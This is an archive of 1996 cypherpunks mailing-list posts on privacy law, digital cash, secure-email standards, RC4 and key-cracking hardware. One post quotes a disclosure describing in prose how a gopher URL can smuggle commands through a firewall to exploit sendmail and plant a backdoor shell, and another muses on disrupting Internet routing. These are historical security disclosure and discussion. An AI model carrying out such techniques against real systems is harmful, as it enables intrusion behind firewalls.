Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 28 Feb 1996 05:20:18 +0800
To: cypherpunks@toad.com
Subject: Re: Proposed Legislation Regualting Expert Testimony
Message-ID: <v02120d02ad58b9a15290@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


A nameless associate, who lives in Albuquerque, seems to have a local
perspective on this...


>Date: Mon, 26 Feb 1996 17:11:54 -0500
>To: rah@shipwright.com
>Subject: Re: Proposed Legislation Regualting Expert Testimony
>
>Bob,
>
>It is clear from the following why the bill did not pass:
>
>>When a cryptologist or computer expert testifies during a criminal
>>defendant's penalty hearing, the cryptologist or computer expert
>>shall wear a cone-shaped hat no less than two feet in height for the
>>duration of the hearing. The surface of the hat shall be imprinted
>>with stars, moons and lightning bolts.
>>
>>Additionally, the cryptologist or computer expert shall be required to
>>wear a white beard no less than eighteen inches in length for the
>>duration of the hearing. The cryptologist or computer expert shall
>>punctuate crucial elements of his testimony by stabbing at the air
>>with a wand no less than one foot in length.
>>
>>Whenever a cryptologist or computer expert provides expert testimony
>>regarding the defendant's methods, the bailiff of the court shall
>>dim the lights of the court room and shall administer two strikes to
>>a Chinese gong."
>
>You see, the conical hat, the beard, and the wand are the costume of Manny
>Aragon,
>the President pro tem of the Senate, and the striking of the gong is the
>conditioned response of Ray Sanchez, the Speaker of the House, to anything
>Manny says.

Of course, *black* hats and goatees on cryptographers are somewhat de
regeur, cf. Sameer, Eric, Derek, etc. By the way, do *you* have a black
hat, Tim?

Cheers,
Bob Hettinga

PS: I'll stop now.

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Wed, 28 Feb 1996 17:10:02 +0800
To: sameer@atropos.c2.org
Subject: Re: In favour of privacy legislation
In-Reply-To: <199602272230.OAA25250@atropos.c2.org>
Message-ID: <199602272249.OAA25257@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> 	Why shouldn't I be able to sell it. Information is free. If
> it's illegal to sell it in the US, I'm sure Marketing Info, Inc.,
> operating out of Costa Rica, would be happy to sell the information
> about your buying habits.

If we're talking about a US-based, on-shore operation, the reason
why you should not be able to sell my buying habits, ethical
and legal, would be that I gave them to you in the first place,
for a specific purpose. If we're talking about Costa Rica, which
has achieved mythical status as a data haven in some future
cupherpunked world, thenwe're not in the US any more. We're
in the world of the Internet, of the technology-is-law life
that appeals to so many of us (including me), and you wouldn't
be able to track my buying habits anyway.

I'd be using the alpha.c2.org remailer, which would have conveniently
located itself in - where else - Costa Rica.

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 27 Feb 1996 22:28:03 +0800
To: cypherpunks@toad.com
Subject: Perl T-shirt makes the big time
Message-ID: <199602271359.OAA20773@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Spotted in an NSA contractor's office: a column from InfoWeek or some such rag about the RSA-Perl T-shirt. Said column hijacked May's idea that shirting was trivial and turned it on ear-- ITAR is routinely being violated and no one cares.

NSA-heads said they got article by fax from the Death Star in Ft. Meade. Wonder how many black-clad Perl-toters there are on the reservation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@best.com>
Date: Wed, 28 Feb 1996 17:09:43 +0800
To: sameer@c2.org (sameer)
Subject: Re: In favour of privacy legislation
In-Reply-To: <199602272250.OAA21228@infinity.c2.org>
Message-ID: <199602272307.PAA08655@shellx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org:
> 	Your point about alpha is exactly my point. You give merchant
> your alpha address, and they can't do anything valuable with it. No
> law necessary.

Laws protecting privacy are as (un)necessary as those protecting
free speech, with or without cpunk technologies such as alpha.

Speaking of which, are you still interested in writing that 
paper on remailers?

----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 28 Feb 1996 17:06:58 +0800
To: cypherpunks@toad.com
Subject: Cyberspace Hashishim Declare Jihad [NOISY]
Message-ID: <199602280001.QAA03617@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.onworld.com/MUT/elecGur.html has a declaration which includes
many of the crypto-anarchy concepts.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray McKinney <rem3614@tam2000.tamu.edu>
Date: Wed, 28 Feb 1996 17:09:47 +0800
To: cypherpunks@toad.com
Subject: Re: PGP source code book sold out!
In-Reply-To: <9602272119.AA08088@toad.com>
Message-ID: <Pine.SOL.3.91.960227174906.9479B-100000@tam2000.tamu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 27 Feb 1996, John Gilmore wrote:

> Dear John --
> 
> The PGP Source Code book is now out of print.  We assumed there
> would only be limited interest in the source code, so we printed
> only 1500 copies.  When we sold out of this run (just last month), 
> we decided not to reprint, given that the 3.0 release is due this spring.

If you are just wanting to reference the source code book, try your
library, if it is large enough.  The Evans Library here at Texas A&M
University has a copy on its shelf.

Ray

Finger for PGP public key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message has been digitally signed. Altering it may lead to prosecution.

iQCVAwUBMTOY3MmUJGcZVs4ZAQEFHgQAvC7Q0KBsXYIukDk4WHDwSBgBOeiyX4an
efQMJYE3auykDUbnI91w9V1SwpHPSx+3xOjNN6rnmFOlE82rCGcR8XpcUyOQZmgp
5VUrRiKFLgfA4e4E8sQxLHgimFOR2M9NnIafLVs9cmSkzwZRoKmbDtvT40g+YJ4E
eGhN3c243CE=
=gLBJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galvin@eit.com (James M. Galvin)
Date: Wed, 28 Feb 1996 09:48:14 +0800
To: Raph Levien <raph@c2.org>
Subject: Re:
Message-ID: <v02140b08ad5927d34ca3@[153.37.6.16]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:55 PM 2/22/96, Raph Levien wrote:
>MOSS is dead, long live MOSS
>----------------------------
>
>   There were five contenders on the field going into the day, and two
>and a half at the end. MOSS was one of the casualties. A lot of us
>were sorry to see it go, but eliminating candidates has got to happen
>if we're going to have interoperation.
>   It's hard to say exactly what went wrong. MOSS had many advantages,
>and was a nice, clean, pretty standard. I think what doomed it was the
>lack of a good implementation.
>   Even though MOSS is no longer considered a serious contender, one
>piece of it is still very much alive: the multipart/signed message
>format. At the end of the day, there was strong, nearly unanimous
>consensus that multipart/signed should be recommended as the signed
>message format for _all_ of the email encryption protocols.

I debated about responding since you are entitled to your opinion.  After
thinking about it for a while I decided I need to say a little something.

It's my impression that MOSS suffered from lack of representation at this
workshop.  I got that view from at least 6 different people, so I believe
it to be true.  That said, I think it's unfair to declare its demise.

Further there is a good implementation of MOSS.  It was even announced at
the workshop.  Did you miss it?  TIS has done an implementation that is
available for anonymous FTP, albeit only within the US.  It's integrated
with MH, not the most favored mail user agent, but the current version has
shell scripts that perform minimal MIME functions to facilitate integration
with other agents.

Finally, multipart/signed and multipart/encrypted are not MOSS.  They are a
framework independent of any particular secure email technology.  True,
MOSS depends on them, but I regard that as a feature not a bug.

Jim

----------------------------------------------------------------------------
James M. Galvin                                               galvin@eit.com
VeriFone/EIT, PO Box 220, Glenwood, MD 21738                 +1 410.795.6882






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Wed, 28 Feb 1996 17:11:43 +0800
To: cypherpunks@toad.com
Subject: What's this "Digital Cash" stuff...
Message-ID: <v02140b05ad5940d763c8@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Of course, I'm guilty of confusing the topic because I talked
about credit and debit cards in a book with the title "Digital
Cash." Sorry about that.

But I think the whole debate is really pretty confusing. Real
"cash", i.e. Federal Reserve Notes, are pretty traceable.
They've got serial numbers on them. If it was practical to
require everyone to keep a log book of serial numbers, someone
could really track the flow of currency throughout the economy.
Note that serial numbers aren't that important for paper
currency because the physical difficulty of finding a good
printing press is supposed to prevent counterfeitting. Digital
"cash" requires the serial numbers to prevent copying. (Everyone
should read today's NYT article on the counterfeits.) So I would
argue that Fed. Reserve notes aren't "cash" either. It's only a
matter of time before FinCen starts requiring everyone to report
every serial number.

But while I think Tim's point is well taken and essentially
correct, we should remember that "cash" is term that also often
means immediately negotiable. For instance, many people who need
to trade large amounts will trade T-bills. These pieces of paper
pay interest! In other circumstances, bringing a cashier's check
is what people mean when they talk about "paying in cash." A
real estate buyer who actually showed up at a closing with
$300,000 in $100 bills would be pretty unpopular, even if he
said he was going to pay in "cash".

So, I guess it's all just a question of semantics. But that's
life on the Information Super highway where it may just be
illegal to run the "finger" protocol.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 28 Feb 1996 20:32:06 +0800
To: cypherpunks@toad.com
Subject: Re: E$? Whatever
Message-ID: <m0treq1-0008zAC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 PM 2/27/96 EST, Dr. Dimitri Vulis wrote:
>A GLIMPSE INTO THE FUTURE OF MONEY, AS CITI SEES IT
>Known inside Citicorp as the Electronic Money System, the bank's
>version of electronic currency for cyberspace is the result of
>four years of mostly top-secret toil by technical wizards who
>report to Colin Crook, the New York money-center's top technology
>officer.

You know, if I were a bank, I'd think twice before I hired a person named
"Crook" as the "top technology officer."

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 28 Feb 1996 17:05:19 +0800
To: cypherpunks@toad.com
Subject: E$? Whatever
Message-ID: <2koZJD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


A GLIMPSE INTO THE FUTURE OF MONEY, AS CITI SEES IT
Known inside Citicorp as the Electronic Money System, the bank's
version of electronic currency for cyberspace is the result of
four years of mostly top-secret toil by technical wizards who
report to Colin Crook, the New York money-center's top technology
officer. Still in a prototype stage and probably years away from
full-scale operation, the Electronic Money System is described as
fully equivalent to cash, but hardware and software reside on
secure processing environment.
     At a recent demonstration, one of six laptops was programmed
to contain the functions of two banks, with icons representing
tellers, security, and other features. The other terminals were
set up to display "electronic wallets" that individuals can use
to withdraw money from the virtual bank, exchange money with each
other, and perform a variety of sophisticated transactions. For
example, a customer on one laptop can transfer $100 and 50
British pounds from his bank account to his electronic wallet.
The cash then exists in digital form on the individual's computer
hardware. "Our system does not depend on any network mechanism
for security," said project manager Sholom Rosen. "The security
is between the two devices. They have their own cryptography and
security." Bank officials said they intend to apply the
technology first in wholesale functions, with retail use still
far in the future.
                         -- American Banker, 2/23/96

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 28 Feb 1996 20:36:40 +0800
To: cypherpunks@toad.com
Subject: Re: Numbers don't lie...
Message-ID: <199602280652.WAA09136@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:23 AM 2/27/96 -0800, jamesd@echeque.com wrote:
>At 11:18 AM 2/18/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>>Finally, no cost is allocated to the sustem required to program/evaluate
>>the ponderings of these 100's of ASICs. As anyone who has ever programmed
>>a massively parallel computer (which is what they are talking about in their
>>brute force machine, it is the boundary communications that kill you.
>
>Again:  Interprocess communication is trivial.  A brute force key cracking
>machine is *not* a general purpose massively parallel computer.

Yeah - the interprocess communications includes handing out keyspace
(pretty simple, especially if each chip has a way to find out its name),
broadcasting the cyphertext and known plaintext, letting the winner forward
the successful key, and broadcasting the "you can stop now" message.

Back when the AT&T DSP-32 was new and hundred-CPU machines were exciting,
AT&T made a box that had 128 DSPs in a binary tree; each one had a couple
flavors of RAM and some communications glue.  It would work just fine for this
sort of applications (except that the DSP32 was a floating-point DSP
and what you really need here is big integers.)

And the Inmos Transputer, with its 4 communications channels, would do
just fine as well - you could either build the things into large grids
or build a large ternary tree, or get fancy and build cubes of 6 chips
that you make hypercubes out of, or whatever.  A modern version of the same
chip, built out of FPGAs or ASICs with enough memory and program on chip,
would blaze just fine.


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 28 Feb 1996 17:02:37 +0800
To: cypherpunks@toad.com
Subject: Intelligence ANFO
Message-ID: <199602280358.WAA05719@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


FAS offers the January 19, 1996 testimony before the 
President's Commission on the Future of Intelligence by Bobby 
Inman, Frank Carlucci and others including Richard Haass, 
principal author of the recent CoFR report (which is now also 
at the IRP site).


     URL: http://www.fas.org/pub/gen/fas/irp/offdocs.html#aspin


The Commission's report to the President is due this Friday.


For admiration of the deeply set spook-hooks in the US economy, 
take a look at the IRP humongous list of firms that happily 
fabricate products for $28 billion per year. Firms that 
generously pasture the ex-TLAs like Inman, Carlucci, Haass, et 
al, for their, uh, wisdom and expert testimony to insure a 
bountiful demand for fertilizer and fuel oil.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 28 Feb 1996 19:32:28 +0800
To: cypherpunks@toad.com
Subject: Re: Remember, RC4 is now PC1
Message-ID: <199602280431.XAA21477@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart wrote:
> >Every time you say RC4 without saying "Trademark of some bunch of
> >lawyer scum" you theoretically break the lawyer made law.  So let us
> >stop doing it.   Serve them right.
> 
> You can always call it "Ron's Code 4" or "Rivest's Code 4" or whatever.

Bah. I don't think there's much RSA can do, esp. if you use a homegrown
implementation.

If someone says "A stream cipher compatible with RSA's RC4 (tm)" then
what is RSA going to do?

It'd be funny if the next time somebody hacks a proprietary code, if they
make some changes, redo the key schedule, perhaps in mind of 
strengthening the algorithm, and then post it to sci.crypt as "hey, I got
this idea for a new crypto algorithm... what do you think?".  If the 
algorithm is different enough from the proprietary code version, with
no clear connection between them, and the author can give full design 
rationale as if s/he wrote it from scratch, then what's a company to do?

(If the practice of secret/proprietary algorithms continues for the long 
term future then it's quite possible a genuine coincidence like this will 
occur... RC4 [officially secret] and RC5 [not officially secret] are some 
very simply constructed algorithms... what's to say another skilled 
cryptographer could not have reinvented the wheel?)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTPauioZzwIn1bdtAQGR9QGAkRVkH2PZFk2LShKcBqGoWJTDkLX87sBL
Uc4bo2ksl47YEXQ2slL238auZVLBFCC8
=D1/4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 28 Feb 1996 15:48:31 +0800
To: daw@cs.berkeley.edu
Subject: Re: fun with the web and security
In-Reply-To: <9602280238.AA15724@espresso.CS.Berkeley.EDU.mammoth>
Message-ID: <Pine.SOL.3.91.960227233313.1545A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



This has been discussed a lot in the URI working groups since around 92. 
I think it's actually documented in the RFC

Simon

> Here's a fun way to exploit security holes via the web:
> 	http://www.cs.berkeley.edu/~daw/js1.html
> A rough representation of its contents follow.
> 
> 
> 
> Whee! The web is awfully convenient for exploiting security bugs.... 
> 
> The following URL contacts your sendmail SMTP server and attempts to exploit
> an old, well-known security hole, trying to gain root access. Click _here_
> to try it. 
> 
> As it stands, clicking on the URL above does not do anything harmful to your
> machine-- but it could! (This is a test of the emergency broadcast system.
> This is only a test.) 
> ______________
> 
> We can get you to send arbitrary text, to an arbitrary port on an arbitrary
> host, from your machine.  (If you are inside a firewall, we can thereby send
> arbitrary text to any internal machine by getting you to click on the link
> above.) The technique is simple: we list the host and port in a gopher URL,
> and encode the text to be sent in the path. 
> 
> For instance, a successful exploit of the hole could leave a backdoor root
> shell, and inform us via a pseudonym at an anonymous remailer. 
> 
> The exploit could be hidden by use of the JavaScript "width=1,height=1"
> techniques pioneered at John LoVerso's _JavaScript security hole page_; then
> you wouldn't even know when you'd been attacked. 
> 
> The exploit could be forced on you via many standard tricks: the Redirect:
> or META-EQUIV Refresh: or JavaScript mechanisms work fine, for instance. 
> 
> This is most dangerous when you are behind a firewall. Typically, there will
> be many machines inside a firewall which run insecure software. Normally,
> that would be safe, since the firewall prevents an outsider from connecting
> to the unsafe sendmail servers inside-- yet the example URL above allows
> outsiders like us to exploit security holes on the inside of your firewall.
> Nothing stops us from putting the IP address of a vulnerable machine inside
> your firewall in the URL above, and waiting for you to click on it: the
> firewall doesn't prevent connections from you to the internal vulnerable
> machine, and thus can't stop this attack. Using JavaScript, we don't even
> have to wait for you to click on anything. Furthermore, a JavaScript program
> could systematically and invisibly try all the machines inside your firewall. 
> 
> We could have used many other well-known security holes: there's nothing
> special about this particular sendmail bug (except that it was convenient
> for us to implement). 
> ______________
> 
> Be afraid. Be very afraid. 
> -- Ian Goldberg and David Wagner. 
> 
> 

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk>
Date: Wed, 28 Feb 1996 20:52:22 +0800
To: cypherpunks@toad.com
Subject: Diffie-Hellman for Matchmaking?
Message-ID: <313395CB.4343@dcs.rhbnc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


sci.crypters and cypherpunks:

This is a followup to my "Dating Problem" question I posted on
sci.crypt, some months ago. I am trying to find or design some
matchmaking protocols (and implement one of them, eventually)
that have all the nice properties, like privacy and fairness.

I came up with two or three candidate protocols, but they all
rely on the Diffie-Hellman "common key" for mutual authentication.
I haven't seen it used for such purposes in the literature, and I
am suspicious.

The setup is the same as in Diffie-Hellman key exchange.
Assume global: prime n and primitive element g mod n. All the
participants have a pair of (secret, public) keys, where
public=g^secret mod n. By common key I mean
g^(secret_a*secret_b)mod n.

Person A is interested to match person B, so he computes
g^(AB)mod n. B is interested in X, where X may or may not
be A, and calculates g^(BX)mod n. Now, they compare these
two "common keys" either using some Zero Knowledge scheme
that ensures fairness (at no point one party has significantly
more information than the other) or through a Trusted Third Party.
If they are the same, then this means X=A, so A and B
have a match (e.g. a date). The common keys must remain
secret (hence the ZK above): if g^(BX)mod n "escaped"
to the public, then the real X would find out that
B is interested in him.

Is anything wrong with this, specificaly with the use
of the "common key"?

  Dimitris

-- 
Dimitris Tsapakidis               PGP keyID: 735590D5
dimitrt@dcs.rhbnc.ac.uk           MSc in Information Security,
This space reserved               Royal Holloway, University of London
for future use.                   Origin: Thessaloniki, Macedonia, Hellas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 28 Feb 1996 19:34:42 +0800
To: cypherpunks@toad.com
Subject: Re: Privacy legislation in CA
Message-ID: <199602280442.XAA21538@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>   SECTION 1.  The Legislature hereby finds and declares the
> following:
>    (a) All people have an inalienable right to privacy as
> declared in Section 1 of Article I of the California
> Constitution.

Does the bill define "privacy" explicitly? Or is it defined clearly 
anywhere else in California law? That can be a real problem... (the US 
Supreme Court seems to limit 'privacy' to what goes on in bed between a 
married heterosexual couple, for instance.)

>    (b) Advances in technology have made it easier to create,
> acquire, and analyze detailed personal information about an
> individual.
>    (c) Personal information, including information about a
> person's financial history, shopping habits, medical history,
> and travel patterns, is continuously being created.
>    (d) The unauthorized use of personal information concerning
> an individual is an infringement upon that individual's right to
> privacy.

What is unauthorized use?  Is it still acceptable to collect information 
on someone?  Is a person given the right to know who is tracking them, 
and what someone else or a corporation has about them?


>   SEC. 2.  Section 43.2 is added to the Civil Code, to read:
>    43.2.  No person or corporation may use or distribute for
> profit any personal information concerning a person without that
> person's written consent.  Such information includes, but is
> not limited to, an individual's credit history, finances,
> medical history, purchases, and travel patterns.

What counts as written consent? Checking a "Yes, you may send my name to 
interested advertisers so I can receive lots of junk mail to burn in my 
stove to keep warm in the winter" box?  And once a person has checked off 
on it, is it ok for a corporation to redistribute that info without 
asking permission (since it's already been signed off), of must that 
third party again ask permission?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTPdKCoZzwIn1bdtAQEnvAF/dslZaaBn0j8ZyEHH3t97LyzjBHCai04A
ng/kuJ5nkkneIVAl2OJKZAnq8JSaIzqp
=0Tmm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Knowles" <brad@azathoth.ops.aol.com>
Date: Wed, 28 Feb 1996 19:36:27 +0800
To: "Blake Ramsdell" <galvin@eit.com>
Subject: Re: RE: [ Death of MOSS? ]
In-Reply-To: <UPMAIL01.199602280321080943@msn.com>
Message-ID: <9602272344.ZM4410@azathoth.ops.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 28, 12:16am, Blake Ramsdell wrote:

> > James M. Galvin said:
> > It's my impression that MOSS suffered from lack of representation at this
> > workshop.  I got that view from at least 6 different people, so I believe
> > it to be true.  That said, I think it's unfair to declare its demise.
> 
> I agree with this impression -- I think that MOSS was not represented in any 
> meaningful way.  The question that begs to be asked is:  why?

    May I restate a point I've been saying for a while?

    From what I recall of Terry Gray's presentation, MOSS seemed to be
a highly thought of integration of MIME and security, although perhaps
none of us thought much of the particular TIS freely available
implementation.

    I know that, from my personal perspective, MOSS appears to be the
best example of integrating security into MIME, at least from a
framework perspective.  The only reason PGP/MIME also rates a "+" in
my book is because it is based on the current PGP standard (the de
facto standard for our primary user base) as well as being reasonably
well integrated into MIME.


    I would vehemently oppose any statement that MOSS *as a framework*
is dead.  I don't think the particular TIS freely available
implementation has much of a future, but I'm a very strong supporter
for taking the existing MOSS standard and removing any remaining
algorithm specifics and then using it as a framework for implementing
a secure email standard with the PGP, S/MIME, or MSP trust models,
certificates, encryption algorithms, etc....

    Obviously a few additional enhancements would be necessary, such
as cryptographic signatures on return receipts and classification
labels (as two examples, there may be more), but MOSS is my current
best yardstick for measuring just how well a secure email standard
really is integrated into MIME, with the absolute minimal amount of
disturbance to the existing MIME standard (and thus, making it the
most "native" MIME implementation of a secure email standard).


    And if you look at what I've said previously, it is my firm belief
that if we are to succeed in giving users a truly interoperable secure
email standard, then said standard must be fully and completely
integrated into MIME and do everything it does in the proper MIME way,
as opposed to just being security grafted on.

    This is why I advocate finding out what the current (proposed)
MIME way is of handling return receipts and then finding how we can
add the dimension of security to those receipts, instead of just
defining our own secure receipts that are distinct from regular
receipts.


    MOSS the implementation may well be dead, but MOSS the framework I
feel is very much alive, and will likely continue to live well beyond
the other standards that were championed by presenters who remained at
the workshop into the afternoon, if only because I think MOSS as a
framework will likely define the framework that the other standards
(and any future standards) will have to find a way to fit into.

-- 
Brad Knowles                           MIME/PGP: BKnowles@aol.net
    Mail Systems Administrator          <http:www.his.com/~brad/>
    for America Online, Inc.                   Ph: (703) 453-4148




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 28 Feb 1996 19:31:03 +0800
To: cypherpunks@toad.com
Subject: Re: PGP source code book sold out!
Message-ID: <199602280447.XAA21568@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ray McKinney wrote:
> On Tue, 27 Feb 1996, John Gilmore wrote:[..]
> > The PGP Source Code book is now out of print.  We assumed there
> > would only be limited interest in the source code, so we printed
> > only 1500 copies.  When we sold out of this run (just last month),
> 
> If you are just wanting to reference the source code book, try your
> library, if it is large enough.  The Evans Library here at Texas A&M
> University has a copy on its shelf.

You could also use Inter-Library Loan... though it's on permanent reserve
at a library here.

I took a look at it, it's mainly source code. Not much text giving 
anything new that I saw.  Having the files with the source code is fine 
enough.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTPeayoZzwIn1bdtAQGa7AGA2+yomb6WOzh7Wx+n65m2uo3FvPAeqmvb
U/nsvR011Xy21A1YgCodwniqpiCMCs/6
=U+85
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 28 Feb 1996 19:34:23 +0800
To: cypherpunks@toad.com
Subject: Re: Internet shutdown Feb 29?
Message-ID: <199602280455.XAA21627@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Interesting. My ISP was shut down for a day this week because of a 
"problem with a router upstream from us". <insert emoticon here>

It would be nice to see ISPs maintain multiple paths or at least have
a set of backup connections to keep outages like this from happening.


Simon Spero wrote:
> 
> As a matter of interest, I wonder how much of the internet could be
> shut down by concerted effort; obviously individual services can be
> trivially disabled by jamming listen queues (not really stoppable by
> anything short of IPSEC w/photuris). The BGP backbone could probably be
> disabled from within by a traitor planted in one of big companies, and a
> confused backhoe around the MAEs could probably do a lot more damage than
> people would like to admit. It seems that the internet is getting pretty
> brittle- I wonder if it would be worthwhile having some sort of infranet
> with a bunch of backups links using dial-up lines or spare transponders
> (with a filter to block port 80 :-)
> 
> It's probably not possible with  todays routing technology
> (slow, flappy links with nightmarish convergence times), plus it's not
> sexy like a nice OC-12 SONET. This is the sort of thing the NCSC should
> be working on- something to keep the essential services flowing in the
> early stages of an info-war, or an info truck-bomb
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTPgOyoZzwIn1bdtAQHhzwF+IpnE8dOwNVq0SXSshqc6oEpMo99knyBC
8VnvSn7qvaHn6AJqTIrIKII2InR9cLR9
=N5QY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 28 Feb 1996 22:31:22 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: "Physical Reality"
Message-ID: <199602280801.AAA08840@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Boiled down to its essentials, this argument can be expressed by the lyrics
> > of the song "Bad Boys" as used as the theme song of the reality TV show
> > "Cops."  For those who no longer participate in the previous culture, they 
> > are:
> >
> > Bad Boys, Bad Boys
> > Whatcha gonna do? 
> > Whatcha gonna do when they come for you? 
> > Bad Boys, Bad Boys

At 08:41 AM 2/28/96 +1100, Mark wrote:
> the bad boys are the
> criminals, the song is about what will you do when the cops come for you.
> The cops are not the "bad boys" in the song. Trust me.

Clearly, one of the purposes of the show "Cops" is to intimidate.  Even
though the police have total editorial control they often show thuggish
and perhaps illegal behavior.  (though they also sometimes show cops 
displaying hard to believe forbearance)

Since the show is, in part, intimidatory, it seems reasonable to suppose
that the cops are the bad boys who are going to come for you.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blake Ramsdell" <Blaker@msn.com>
Date: Wed, 28 Feb 1996 12:05:21 +0800
To: "James M. Galvin" <galvin@eit.com>
Subject: RE:
Message-ID: <UPMAIL01.199602280321080943@msn.com>
